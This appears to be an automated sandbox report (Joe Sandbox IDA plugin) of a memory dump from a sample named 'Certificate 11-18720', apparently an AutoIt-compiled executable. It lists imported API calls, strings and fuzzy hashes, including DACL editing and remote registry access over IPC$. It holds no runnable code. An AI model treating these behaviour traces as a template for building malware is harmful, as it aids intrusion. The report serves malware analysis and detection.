                                                                                    • Opcode Fuzzy Hash: ae7ce7f40a2fcf998fc133bdf7e362db8e9a36bd199b823a1744d291a7043c29
                                                                                    • Instruction Fuzzy Hash: 13513A71504206AFC704EF54C886E6ABBE5FF99718F04895DF889673A1DB31EE06CB42
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00633973,00000016,0000138C,00000016,?,00000016,0065DDB4,00000000,?), ref: 006026F1
                                                                                    • LoadStringW.USER32(00000000,?,00633973,00000016), ref: 006026FA
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00633973,00000016,0000138C,00000016,?,00000016,0065DDB4,00000000,?,00000016), ref: 0060271C
                                                                                    • LoadStringW.USER32(00000000,?,00633973,00000016), ref: 0060271F
                                                                                    • __swprintf.LIBCMT ref: 0060276F
                                                                                    • __swprintf.LIBCMT ref: 00602780
                                                                                    • _wprintf.LIBCMT ref: 00602829
                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00602840
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                    • API String ID: 618562835-2268648507
                                                                                    • Opcode ID: b20dd7d37be2c25afd8c2097229e6bafb4b0f2415dc6fa2877f6221ff85b0348
                                                                                    • Instruction ID: 946b2aaf1397c7fc8b57f8211fb7907071122e5d79736699151243727f9ca6df
                                                                                    • Opcode Fuzzy Hash: b20dd7d37be2c25afd8c2097229e6bafb4b0f2415dc6fa2877f6221ff85b0348
                                                                                    • Instruction Fuzzy Hash: 0F413D7280021AAACB14FBD0DD9AEEEBB79BF95340F500069F50576092EE306F49CB60
                                                                                    APIs
                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0060D0D8
                                                                                    • __swprintf.LIBCMT ref: 0060D0FA
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0060D137
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0060D15C
                                                                                    • _memset.LIBCMT ref: 0060D17B
                                                                                    • _wcsncpy.LIBCMT ref: 0060D1B7
                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0060D1EC
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0060D1F7
                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0060D200
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0060D20A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                    • String ID: :$\$\??\%s
                                                                                    • API String ID: 2733774712-3457252023
                                                                                    • Opcode ID: 9b63d39c3adfc22705b4520a395c57f741d28f864900448a9aaf1ed0cb474d81
                                                                                    • Instruction ID: c4255e8480866420983507e7327a8e7afbfb16c817f46ba1ea5125dbf3127ad5
                                                                                    • Opcode Fuzzy Hash: 9b63d39c3adfc22705b4520a395c57f741d28f864900448a9aaf1ed0cb474d81
                                                                                    • Instruction Fuzzy Hash: 3E31C3B694010AABDB21DFA0CC49FEB37BEEF89740F1041B5F609D21A0EB7097458B24
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                    • String ID:
                                                                                    • API String ID: 884005220-0
                                                                                    • Opcode ID: 76e9aa142fd9f5a363553057ee56759057014b8600435bfa191fd2e4de0e4349
                                                                                    • Instruction ID: 59c58d4c41831c3e59b3567fd8cc97d40539c8cff6dbb939e9c23ad608290fcc
                                                                                    • Opcode Fuzzy Hash: 76e9aa142fd9f5a363553057ee56759057014b8600435bfa191fd2e4de0e4349
                                                                                    • Instruction Fuzzy Hash: F161057290020AAFEB259F65DD497793FA4FF543B0F200925EA81AB181DF78DD408B95
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0062E754
                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0062E76B
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0062E776
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0062E783
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0062E78C
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0062E79B
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0062E7A4
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0062E7AB
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0062E7BC
                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0064D9BC,?), ref: 0062E7D5
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0062E7E5
                                                                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 0062E809
                                                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0062E834
                                                                                    • DeleteObject.GDI32(00000000), ref: 0062E85C
                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0062E872
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 3840717409-0
                                                                                    • Opcode ID: 725e588757c73f3f9ddcf6064e2afe89fc7896417711ac90bb26d029c0e6aeb0
                                                                                    • Instruction ID: d9be9a5a2319721604c597a6f10d243f8dae76f4264333ce91925703b5335090
                                                                                    • Opcode Fuzzy Hash: 725e588757c73f3f9ddcf6064e2afe89fc7896417711ac90bb26d029c0e6aeb0
                                                                                    • Instruction Fuzzy Hash: 06414879A00215EFDB119F65DC88EAB7BBAEF8AB11F108068F906D7260C7719941DF20
                                                                                    APIs
                                                                                    • __wsplitpath.LIBCMT ref: 0061076F
                                                                                    • _wcscat.LIBCMT ref: 00610787
                                                                                    • _wcscat.LIBCMT ref: 00610799
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006107AE
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 006107C2
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 006107DA
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 006107F4
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00610806
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                    • String ID: *.*
                                                                                    • API String ID: 34673085-438819550
                                                                                    • Opcode ID: 9264345e8c2048588146fe96ce2a0fd94af741f23a030105797be0f1efc80276
                                                                                    • Instruction ID: c4b986720dca2033a6d371e2b31bbcb769e6bc2e937ddb308ac2acd55d717b3f
                                                                                    • Opcode Fuzzy Hash: 9264345e8c2048588146fe96ce2a0fd94af741f23a030105797be0f1efc80276
                                                                                    • Instruction Fuzzy Hash: E0818F715043419FEF64DF64C8459EAB7EABBC9304F18482EF889C7251EAB0DDC58B92
                                                                                    APIs
                                                                                      • Part of subcall function 005DB34E: GetWindowLongW.USER32(?,000000EB), ref: 005DB35F
                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0062EF3B
                                                                                    • GetFocus.USER32 ref: 0062EF4B
                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0062EF56
                                                                                    • _memset.LIBCMT ref: 0062F081
                                                                                    • GetMenuItemInfoW.USER32 ref: 0062F0AC
                                                                                    • GetMenuItemCount.USER32(00000000), ref: 0062F0CC
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0062F0DF
                                                                                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0062F113
                                                                                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0062F15B
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0062F193
                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0062F1C8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1296962147-4108050209
                                                                                    • Opcode ID: f07ef08570897906d8ab806a8040b9bbff4b044f97be01f625ed36f2d3169a83
                                                                                    • Instruction ID: d7dc0a27fe183962a71e9d05f4e0ce44c2ff6cd3c22355bb422eb7c626fea5e4
                                                                                    • Opcode Fuzzy Hash: f07ef08570897906d8ab806a8040b9bbff4b044f97be01f625ed36f2d3169a83
                                                                                    • Instruction Fuzzy Hash: 3E818A70504721AFD720CF14E988AABBBEAFB89314F00453EF99897291D731D815CF92
                                                                                    APIs
                                                                                      • Part of subcall function 005FABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 005FABD7
                                                                                      • Part of subcall function 005FABBB: GetLastError.KERNEL32(?,005FA69F,?,?,?), ref: 005FABE1
                                                                                      • Part of subcall function 005FABBB: GetProcessHeap.KERNEL32(00000008,?,?,005FA69F,?,?,?), ref: 005FABF0
                                                                                      • Part of subcall function 005FABBB: HeapAlloc.KERNEL32(00000000,?,005FA69F,?,?,?), ref: 005FABF7
                                                                                      • Part of subcall function 005FABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 005FAC0E
                                                                                      • Part of subcall function 005FAC56: GetProcessHeap.KERNEL32(00000008,005FA6B5,00000000,00000000,?,005FA6B5,?), ref: 005FAC62
                                                                                      • Part of subcall function 005FAC56: HeapAlloc.KERNEL32(00000000,?,005FA6B5,?), ref: 005FAC69
                                                                                      • Part of subcall function 005FAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,005FA6B5,?), ref: 005FAC7A
                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 005FA8CB
                                                                                    • _memset.LIBCMT ref: 005FA8E0
                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 005FA8FF
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 005FA910
                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 005FA94D
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005FA969
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 005FA986
                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 005FA995
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 005FA99C
                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 005FA9BD
                                                                                    • CopySid.ADVAPI32(00000000), ref: 005FA9C4
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 005FA9F5
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 005FAA1B
                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 005FAA2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3996160137-0
                                                                                    • Opcode ID: d5dc5391d3d1af0830337ad0865a35a17f537ab8131d0520af79f6b276a3decc
                                                                                    • Instruction ID: e985dd0fdf94af758979c23abcb9e53addf2cc35008774dc8028a6bc46f6e08f
                                                                                    • Opcode Fuzzy Hash: d5dc5391d3d1af0830337ad0865a35a17f537ab8131d0520af79f6b276a3decc
                                                                                    • Instruction Fuzzy Hash: 3B515DB590020AAFDF11DF90DD45AFEBBBAFF05300F048129FA55A7290D7399A05CB62
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 00619E36
                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00619E42
                                                                                    • CreateCompatibleDC.GDI32(?), ref: 00619E4E
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00619E5B
                                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00619EAF
                                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00619EEB
                                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00619F0F
                                                                                    • SelectObject.GDI32(00000006,?), ref: 00619F17
                                                                                    • DeleteObject.GDI32(?), ref: 00619F20
                                                                                    • DeleteDC.GDI32(00000006), ref: 00619F27
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00619F32
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                    • String ID: (
                                                                                    • API String ID: 2598888154-3887548279
                                                                                    • Opcode ID: b8fb07f59171c892291fcff14b50f5cb477f66d6e04f65ea24950f75454d144c
                                                                                    • Instruction ID: e19f110caaa2f7619f13d17415df2c70f7445787c28b7ea659267d28eb6b04ae
                                                                                    • Opcode Fuzzy Hash: b8fb07f59171c892291fcff14b50f5cb477f66d6e04f65ea24950f75454d144c
                                                                                    • Instruction Fuzzy Hash: 07512975900309AFCB15CFA8D885EEEBBBAEF49710F14841DF95A97350D731A941CBA0
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: LoadString__swprintf_wprintf
                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                    • API String ID: 2889450990-2391861430
                                                                                    • Opcode ID: c361465ea80afe77def5d3a4023f59612c9235588fd888898c7511013f6cbad1
                                                                                    • Instruction ID: 66144f7efd3d6e4cb3181cde8f13860df887b0883c884a786a6c45cbe0c94268
                                                                                    • Opcode Fuzzy Hash: c361465ea80afe77def5d3a4023f59612c9235588fd888898c7511013f6cbad1
                                                                                    • Instruction Fuzzy Hash: F3516F3180011ABECB19EBE0CD4AEEEBB7ABF45304F104169F505761A2EB316F59DB61
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: LoadString__swprintf_wprintf
                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                    • API String ID: 2889450990-3420473620
                                                                                    • Opcode ID: ecf7260fc882ec43f2655e42dbea48f331583f54d3042824962bf4c750f6b04f
                                                                                    • Instruction ID: c2c035351dbdc709cb0183635ef99a3a2f355d43114f99a4b445980dbdd6a3dc
                                                                                    • Opcode Fuzzy Hash: ecf7260fc882ec43f2655e42dbea48f331583f54d3042824962bf4c750f6b04f
                                                                                    • Instruction Fuzzy Hash: EA51707194010AAEDB19EBE0CD4AEEEBB79BF44300F504169F50972192EB306F99DB61
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00622BB5,?,?), ref: 00623C1D
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID: $Eg$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                    • API String ID: 3964851224-1334267600
                                                                                    • Opcode ID: 131c8a3d43678bac6308c4aafa94137bff4a10f1ffecd175a70c04de5c6fb4b3
                                                                                    • Instruction ID: 9e748f20baf657744002478695692495f1d46be2adeeb97226dfce1d8ebe3868
                                                                                    • Opcode Fuzzy Hash: 131c8a3d43678bac6308c4aafa94137bff4a10f1ffecd175a70c04de5c6fb4b3
                                                                                    • Instruction Fuzzy Hash: 13411E3411066A8BDF10EF14E955AEA3B67FF92340F50485AEC591B3A2EF749E0ACF50
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 006055D7
                                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00605664
                                                                                    • GetMenuItemCount.USER32(00681708), ref: 006056ED
                                                                                    • DeleteMenu.USER32(00681708,00000005,00000000,000000F5,?,?), ref: 0060577D
                                                                                    • DeleteMenu.USER32(00681708,00000004,00000000), ref: 00605785
                                                                                    • DeleteMenu.USER32(00681708,00000006,00000000), ref: 0060578D
                                                                                    • DeleteMenu.USER32(00681708,00000003,00000000), ref: 00605795
                                                                                    • GetMenuItemCount.USER32(00681708), ref: 0060579D
                                                                                    • SetMenuItemInfoW.USER32(00681708,00000004,00000000,00000030), ref: 006057D3
                                                                                    • GetCursorPos.USER32(?), ref: 006057DD
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 006057E6
                                                                                    • TrackPopupMenuEx.USER32(00681708,00000000,?,00000000,00000000,00000000), ref: 006057F9
                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00605805
                                                                                    Similarity
                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3993528054-0
                                                                                    • Opcode ID: cd92d136ec8e8d1e6d03d71073c3125921c1b8b984a40718549c4f36cf2296c2
                                                                                    • Instruction ID: 0acbf545e2f2fd457322c92702d9968974eda6e58db10e66e568fd6cf1854739
                                                                                    • Opcode Fuzzy Hash: cd92d136ec8e8d1e6d03d71073c3125921c1b8b984a40718549c4f36cf2296c2
                                                                                    • Instruction Fuzzy Hash: B271F470680615BEEB289B54CC49FEBBF6AFB01364F244205F6166A2E1CBB25850DF64
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 005FA1DC
                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 005FA211
                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 005FA22D
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 005FA249
                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 005FA273
                                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 005FA29B
                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005FA2A6
                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 005FA2AB
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                    • API String ID: 1687751970-22481851
                                                                                    • Opcode ID: 0f2aad1ddb261b4977c767bac078e7747750ca5657dc47dbd615c4af7483c2fa
                                                                                    • Instruction ID: 99b4bfcc72e7ed8c9497461a8781f8e6d3e226fcef86a2aa1a62d4358c34c80b
                                                                                    • Opcode Fuzzy Hash: 0f2aad1ddb261b4977c767bac078e7747750ca5657dc47dbd615c4af7483c2fa
                                                                                    • Instruction Fuzzy Hash: 7F410576C1022EAEDB21EBE4DC99EEDBBB9FF44700F054029E905A3160EB349E05CB51
                                                                                    APIs
                                                                                    • __swprintf.LIBCMT ref: 006067FD
                                                                                    • __swprintf.LIBCMT ref: 0060680A
                                                                                      • Part of subcall function 005E172B: __woutput_l.LIBCMT ref: 005E1784
                                                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00606834
                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00606840
                                                                                    • LockResource.KERNEL32(00000000), ref: 0060684D
                                                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0060686D
                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 0060687F
                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0060688E
                                                                                    • LockResource.KERNEL32(?), ref: 0060689A
                                                                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 006068F9
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                    • String ID: 5g
                                                                                    • API String ID: 1433390588-2513871569
                                                                                    • Opcode ID: 2229d985358c747f485754d171df7e8c1dba202cca9dcc63135d4bc6a56de666
                                                                                    • Instruction ID: ddedafbc45cf14db335bc9ac68ad323b92130a9b4826882d28aabfb195299bbf
                                                                                    • Opcode Fuzzy Hash: 2229d985358c747f485754d171df7e8c1dba202cca9dcc63135d4bc6a56de666
                                                                                    • Instruction Fuzzy Hash: 8B31AEB594021AABDB089F60DC48AFF7BAEFF09340F008425F912D6280E774DA21DB70
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006336F4,00000010,?,Bad directive syntax error,0065DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 006025D6
                                                                                    • LoadStringW.USER32(00000000,?,006336F4,00000010), ref: 006025DD
                                                                                    • _wprintf.LIBCMT ref: 00602610
                                                                                    • __swprintf.LIBCMT ref: 00602632
                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 006026A1
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                    • API String ID: 1080873982-4153970271
                                                                                    • Opcode ID: b1c388327111aa679b28f598c496526adb81a5ac467ba795b2a4fb710a3ef60f
                                                                                    • Instruction ID: 67926492d144e1053c0d9f6aeda594b7d4ea2bf61edbbc42e1dda751d48d41a5
                                                                                    • Opcode Fuzzy Hash: b1c388327111aa679b28f598c496526adb81a5ac467ba795b2a4fb710a3ef60f
                                                                                    • Instruction Fuzzy Hash: 02216B3180022BAFCF15ABD0CC0EFEE7F3ABF18304F044459F559661A2EA71AA58DB50
                                                                                    APIs
                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00607B42
                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00607B58
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00607B69
                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00607B7B
                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00607B8C
                                                                                    Strings
Similarity
• API ID: SendString
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 890592661-1007645807
APIs
• timeGetTime.WINMM ref: 00607794
  • Part of subcall function 005DDC38: timeGetTime.WINMM(?,75C0B400,006358AB), ref: 005DDC3C
• Sleep.KERNEL32(0000000A), ref: 006077C0
